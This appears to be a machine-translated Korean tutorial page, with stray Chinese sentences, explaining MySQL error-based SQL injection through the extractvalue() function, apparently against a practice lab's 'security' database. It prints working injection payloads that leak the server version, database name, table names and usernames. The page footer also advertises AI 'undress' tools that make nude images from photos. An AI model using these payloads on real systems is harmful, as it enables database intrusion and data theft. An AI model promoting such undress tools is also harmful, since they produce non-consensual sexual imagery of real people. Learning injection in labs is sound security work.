찾다
데이터 베이스MySQL 튜토리얼mysql 오류 주입이란 무엇입니까?

mysql에서 오류 주입이란 페이지에 보고된 오류 정보를 통해 원하는 데이터를 얻기 위해 적절한 명령문을 구성하는 것을 의미하며, 응용 시스템이 데이터베이스 오류 함수를 종료하지 않는 경우 extractvalue() 함수를 사용하여 정보를 반환할 수 있습니다. 대상 XML에 포함된 쿼리 값의 문자열입니다.

mysql 오류 주입이란 무엇입니까?

이 튜토리얼의 운영 환경: windows10 시스템, mysql8.0.22 버전, Dell G3 컴퓨터.

mysql 오류 주입이란 무엇입니까?

1. 오류 주입이란 무엇입니까? 그리고 어떤 상황에서 사용되나요?

  오류 주입은 일종의 블라인드 주입이라고도 할 수 있습니다------정보가 오류 프롬프트를 통해 에코되도록 페이로드를 구성합니다. 공동 쿼리가 명확한 위치를 밝힐 수 없는 경우 오류 주입 사용을 고려할 수 있습니다.

그렇다면 오류 주입은 어떻게 형성되나요?

첫째, 애플리케이션 시스템이 데이터베이스 오류 보고 기능을 닫지 않았습니다. 일부 SQL 문 오류의 경우 페이지에 직접 표시되고 일부는 데이터베이스 이름과 테이블 이름을 직접 유출하기도 합니다. 백그라운드가 MySQL에 응답하지 않는 것이 중요합니다. 오류 보고 기능 필터링

2. 오류 보고에 일반적으로 사용되는 함수

여기서는 extractvalue() 함수를 사용합니다. 이 함수의 기능은 쿼리 값이 포함된 문자열을 반환하는 것입니다. 대상 XML

EXTRACTVALUE (XML_document, XPath_string) : 첫 번째 매개변수: XML_document는 XML 문서 객체의 이름인 문자열 형식입니다. 두 번째 매개변수: 및 extractvalue(1,concat(0x7e,(select @@version)) ,0x7e))--+. 그 중 concat은 concatenation()의 매개변수이고, 0x7e는 디코딩 후 ~ 기호이다. ---+는 주석 문자입니다. 오류를 방지하려면 소스 코드의 모든 후속 명령문을 주석 처리하세요. 테스트 후 결과는 다음과 같습니다.

     //concat 앞의 1은 extractvalue() 함수의 첫 번째 매개변수이며 임의의 숫자로 대체 가능

                  명령문의 두 번째 0x7e는 생략 가능합니다

2. 데이터베이스 이름 가져오기

  문 사용

 1‘ and extractvalue(1,concat(0x7e,(select database()),0x7e))--+,

 3. 테이블 이름 가져오기

     1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+. 其中group_concat将tale_name字段的所有行放在一行上显示出来,如下所示

 4. 데이터 가져오기

    1' and extractvalue(1,concat(0x7e,(select * from (select username from users limit 0,1) as a),0x7e))--+. 修改其中的limit参数即可获取users表中的不同行内容

추천 학습:

mysql 동영상 튜토리얼

위 내용은 mysql 오류 주입이란 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
图文详解mysql架构原理图文详解mysql架构原理May 17, 2022 pm 05:54 PM

本篇文章给大家带来了关于mysql的相关知识,其中主要介绍了关于架构原理的相关内容,MySQL Server架构自顶向下大致可以分网络连接层、服务层、存储引擎层和系统文件层,下面一起来看一下,希望对大家有帮助。

mysql怎么替换换行符mysql怎么替换换行符Apr 18, 2022 pm 03:14 PM

在mysql中,可以利用char()和REPLACE()函数来替换换行符;REPLACE()函数可以用新字符串替换列中的换行符,而换行符可使用“char(13)”来表示,语法为“replace(字段名,char(13),'新字符串') ”。

mysql怎么去掉第一个字符mysql怎么去掉第一个字符May 19, 2022 am 10:21 AM

方法:1、利用right函数,语法为“update 表名 set 指定字段 = right(指定字段, length(指定字段)-1)...”;2、利用substring函数,语法为“select substring(指定字段,2)..”。

mysql的msi与zip版本有什么区别mysql的msi与zip版本有什么区别May 16, 2022 pm 04:33 PM

mysql的msi与zip版本的区别:1、zip包含的安装程序是一种主动安装,而msi包含的是被installer所用的安装文件以提交请求的方式安装;2、zip是一种数据压缩和文档存储的文件格式,msi是微软格式的安装包。

mysql怎么将varchar转换为int类型mysql怎么将varchar转换为int类型May 12, 2022 pm 04:51 PM

转换方法:1、利用cast函数,语法“select * from 表名 order by cast(字段名 as SIGNED)”;2、利用“select * from 表名 order by CONVERT(字段名,SIGNED)”语句。

MySQL复制技术之异步复制和半同步复制MySQL复制技术之异步复制和半同步复制Apr 25, 2022 pm 07:21 PM

本篇文章给大家带来了关于mysql的相关知识,其中主要介绍了关于MySQL复制技术的相关问题,包括了异步复制、半同步复制等等内容,下面一起来看一下,希望对大家有帮助。

带你把MySQL索引吃透了带你把MySQL索引吃透了Apr 22, 2022 am 11:48 AM

本篇文章给大家带来了关于mysql的相关知识,其中主要介绍了mysql高级篇的一些问题,包括了索引是什么、索引底层实现等等问题,下面一起来看一下,希望对大家有帮助。

mysql怎么判断是否是数字类型mysql怎么判断是否是数字类型May 16, 2022 am 10:09 AM

在mysql中,可以利用REGEXP运算符判断数据是否是数字类型,语法为“String REGEXP '[^0-9.]'”;该运算符是正则表达式的缩写,若数据字符中含有数字时,返回的结果是true,反之返回的结果是false。

See all articles

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

뜨거운 도구

Dreamweaver Mac版

Dreamweaver Mac版

시각적 웹 개발 도구

SublimeText3 Linux 새 버전

SublimeText3 Linux 새 버전

SublimeText3 Linux 최신 버전

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

SublimeText3 영어 버전

SublimeText3 영어 버전

권장 사항: Win 버전, 코드 프롬프트 지원!

ZendStudio 13.5.1 맥

ZendStudio 13.5.1 맥

강력한 PHP 통합 개발 환경